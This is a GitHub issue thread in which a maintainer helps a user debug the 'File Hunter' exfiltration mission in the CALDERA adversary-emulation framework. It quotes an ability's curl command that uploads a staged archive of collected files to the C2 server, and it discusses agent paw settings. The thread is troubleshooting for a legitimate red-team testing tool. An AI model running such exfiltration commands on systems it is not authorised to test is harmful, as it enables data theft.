### ISSUE TITLE
Mission #2: File Hunter error

### ISSUE THREAD

**Issue by perra22** [mitre/caldera#613]
Hi, i'm new to Caldera and i was trying the mission File Hunter to improve myself. 
I execute the mission and it works well but when i try to download exfiltrated files the server doesn't find it (staged.tar.gz). Looking at the log i found this error with curl:

> curl: (3) Failed to convert perravirtualboxperra\u201d to ACE; string contains a disallowed character  

in the ability:

> "ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
            "attack": {
                "tactic": "exfiltration",
                "technique_id": "T1041",
                "technique_name": "Exfiltration Over Command and Control Channel"
            }

So the archive isn't uploaded. I've also tried to modify the paw variable in 

> caldera/plugins/sandcat/gocat/sandcat.go 

and remove "$"

Thanks for the help!

**Comment by privateducky** [comment]
to clarify, when you run the 'hunter' adversary, it compresses the staged.tar.gz successfully but then fails to exfiltrate it back to your server? So if you were to look at your target computer, you'd see the staged.tar.gz there?

Assuming that is accurate, it's most likely related to a virtual environment. What operating system is your server running on? Your target is running inside a VM, right? 

Looking at your stack trace, I think you've found the right solution. So when the agent starts, it creates a unique "paw print" with the host$username syntax. On a VM, sometimes these values can be a bit screwy. From the GUI, what is this agent's paw print?

**Comment by perra22** [comment]
Yes compresses it successfully but it fails to exfiltrate it back to my server and I can't see it on my target computer because a clean up procedure is launched.

My server is running on a Linux VM so probably this is the problem. 

From the GUI the agent's paw print is "perravirtualboxperra" without "$" because I've also edited the function trimPaw() in

> chain/static/js/sections.js

Should I install Caldera on a bare metal server?

**Comment by privateducky** [comment]
ah ok. this is good to know-- VMs can act funny (that's the likely issue) but let's see if we can fix this so your type of VM will work, as I'm sure it's a fairly standard Virtual Box VM. 

do you have Go installed on the Linux VM running your server? If not, can you install it? If you have Go installed, the sandcat agent will dynamically compile on each download. otherwise it'll use the pre-compiled sandcat.go-linux file in the plugins/sandcat/payloads directory.

Assuming you have Go installed on the server now, change this line in the sandcat.go file:
```
paw := fmt.Sprintf("%s$%s", host, user.Username)
```
to 
```
paw := "test_agent_paw"
```

Now, re-run your test. The paw should show up in the GUI as "test_agent_paw". If this solves the problem, it'll let us know the issue is with how the paw is getting constructed on your VM.

**Comment by privateducky** [comment]
another question, when your exfil fails, do you see this log executed at all on the server:
```
self.log.debug('Exception uploading file %s' % e)
```

**Comment by perra22** [comment]
I've installed Go.
I've changed the line to

> `paw := "test_agent_paw"`

but in the GUI the paw show up as "perravirtualbox$perra", it seems to ignore the paw value set in "sandcat.go" (and i'm sure that is recompiled). I've also tried to open it in a new incognito window to avoid cache problems.

When exfil fails i don't see the log 

> self.log.debug('Exception uploading file %s' % e)

**Comment by privateducky** [comment]
as I think about it, I think the paw is a likely red-herring (since the rest of your abilities seem to work fine). try this instead:

locate the exfil ability file inside the stockpile/data/abilities directory (snippet below):
```
- id: ea713bc4-63f0-491c-9a6f-0b01d560b87e
  name: Exfil staged directory
  description: Exfil the staged directory
  tactic: exfiltration
  technique:
    attack_id: T1041
    name: Exfiltration Over Command and Control Channel
  platforms:
    ...
    ...
    linux:
      sh:
        command: |
          curl -F "data=@#{host.dir.compress}" --header “X-Request-ID: #{paw}” #{server}/file/upload
   ...
   ...
```

Note the command. Try removing this from the linux command:
```
 --header “X-Request-ID: #{paw}”
```

Then restart CALDERA and re-run your operation. I'm wondering if the paw substitution (that occurs when we swap variables for real values) is encoded funny.

**Comment by perra22** [comment]
I've changed the ability command and reset paw to

> `paw := fmt.Sprintf("%s$%s", host, user.Username)`

and now the operation has ended correctly but when i try to download the archive with the command

> curl -X POST -H "file:staged.tar.gz" http://localhost:8888/file/download

it says "File not found".

**Comment by privateducky** [comment]
perfect. 

files that are exfil'd from a target machine back to the server are put in the exfil directory (check the default.yml file to see where that is, /tmp by default). 

the /file/download endpoint only looks in each plugin's payloads/ directory - not the exfil directory - which is why you're unable to find it through that API call.

**Comment by perra22** [comment]
Thank you very much for your support!
